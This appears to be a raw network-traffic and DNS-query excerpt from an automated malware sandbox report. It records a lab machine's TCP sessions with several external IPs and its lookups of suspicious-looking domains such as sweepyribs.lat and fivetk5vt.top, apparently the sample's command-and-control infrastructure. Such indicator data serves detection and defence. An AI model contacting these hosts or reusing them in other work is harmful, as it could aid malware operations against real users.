                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.136703968 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.137542009 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.137592077 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.137849092 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.137897968 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.138454914 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.138501883 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.138561010 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.138607979 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.139393091 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.139406919 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.139440060 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.139455080 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.140381098 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.140429974 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.140631914 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.140678883 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.141453028 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.141505003 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.141566992 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.141642094 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.165489912 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.165546894 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.165559053 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.165569067 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.165656090 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.165899992 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.165946960 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166028023 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166045904 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166307926 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166318893 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166331053 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166341066 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166351080 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166496992 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166507959 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166520119 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166531086 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166560888 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166661978 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166672945 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166695118 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166769981 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166821003 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166965008 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.166975975 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.167031050 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.167164087 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.167262077 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.167273045 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.167433977 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.167444944 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.167454958 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.167467117 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.167612076 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.167622089 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.167658091 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.167673111 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.167682886 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.167692900 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.168056011 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.168066978 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.168076992 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.168204069 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.168215036 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.168226004 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.168307066 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.168318987 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.168400049 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.168411016 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.168422937 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.168541908 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.168755054 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.169147015 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.169502020 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.172260046 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.172454119 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.172466040 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.172532082 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.172666073 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.172677040 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.172682047 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.172688007 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.172760963 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.172935009 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.172950983 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.172969103 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.172974110 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173105001 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173115015 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173243046 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173254013 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173263073 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173280954 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173290968 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173300982 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173338890 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173413038 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173491955 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173502922 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173665047 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173676968 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173686028 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173697948 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173888922 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.173899889 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174045086 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174055099 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174067020 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174242973 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174252987 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174263000 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174372911 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174384117 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174392939 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174406052 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174463987 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174474001 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174599886 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174611092 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174622059 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174742937 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174753904 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174765110 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174963951 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174973965 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.174983025 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.175122976 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.175272942 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.183331966 CET44349775104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.183588028 CET49775443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.187335014 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.231333971 CET44349775104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289073944 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289160013 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289172888 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289184093 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289257050 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289345026 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289546013 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289558887 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289582968 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289594889 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289606094 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289648056 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289711952 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289722919 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289894104 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289905071 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289916039 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.289963961 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290060043 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290098906 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290146112 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290157080 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290349960 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290424109 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290433884 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290678024 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290688992 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290699959 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290709972 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290719986 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290730000 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290740013 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290760040 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290771008 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.290781021 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.307180882 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.406078100 CET44349775104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.850651026 CET4976880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.850986004 CET4977680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.912434101 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.912456036 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.912518024 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.913134098 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.913151026 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.913233995 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.913233995 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.913738966 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.913779020 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.913803101 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.913825989 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.914676905 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.914719105 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.915410042 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.915429115 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.915468931 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.916150093 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.916162968 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.916199923 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.917706013 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.917725086 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.917768955 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.918441057 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.918452978 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.918486118 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.919223070 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.919234991 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.919320107 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.919893026 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.920558929 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.920592070 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.920605898 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.920620918 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.921329975 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.921966076 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.922359943 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.922373056 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.922414064 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.924021006 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.924035072 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.924074888 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.924623966 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.924638987 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.924660921 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.924675941 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.924690008 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.925219059 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.925232887 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.925246000 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.925295115 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.925295115 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.926059008 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.926071882 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.926116943 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.927052021 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.927064896 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.927100897 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.928657055 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.928669930 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.928733110 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.929373980 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.930017948 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.930075884 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.930597067 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.930644035 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.930705070 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:48.933092117 CET8049765185.215.113.206192.168.2.4

                                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:16.597604990 CET192.168.2.41.1.1.10xb159Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:16.826550961 CET192.168.2.41.1.1.10x6ac7Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.006372929 CET192.168.2.41.1.1.10x3693Standard query (0)cheapptaxysu.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.628175020 CET192.168.2.41.1.1.10xa35aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.628417015 CET192.168.2.41.1.1.10x81c8Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.275518894 CET192.168.2.41.1.1.10x4d7aStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.275621891 CET192.168.2.41.1.1.10x92fcStandard query (0)httpbin.org28IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.156267881 CET192.168.2.41.1.1.10x17f4Standard query (0)home.fivetk5vt.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.156375885 CET192.168.2.41.1.1.10xe201Standard query (0)home.fivetk5vt.top28IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:50.048358917 CET192.168.2.41.1.1.10x26f7Standard query (0)home.fivetk5vt.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:50.048415899 CET192.168.2.41.1.1.10x7eb5Standard query (0)home.fivetk5vt.top28IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:12.622049093 CET192.168.2.41.1.1.10xc510Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:14.799446106 CET192.168.2.41.1.1.10x5983Standard query (0)fivetk5vt.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:14.799822092 CET192.168.2.41.1.1.10xee8aStandard query (0)fivetk5vt.top28IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:17.875346899 CET192.168.2.41.1.1.10xae0aStandard query (0)fivetk5vt.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:17.875389099 CET192.168.2.41.1.1.10x5c0bStandard query (0)fivetk5vt.top28IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:22.101630926 CET192.168.2.41.1.1.10xb05eStandard query (0)github.comA (IP address)IN (0x0001)false
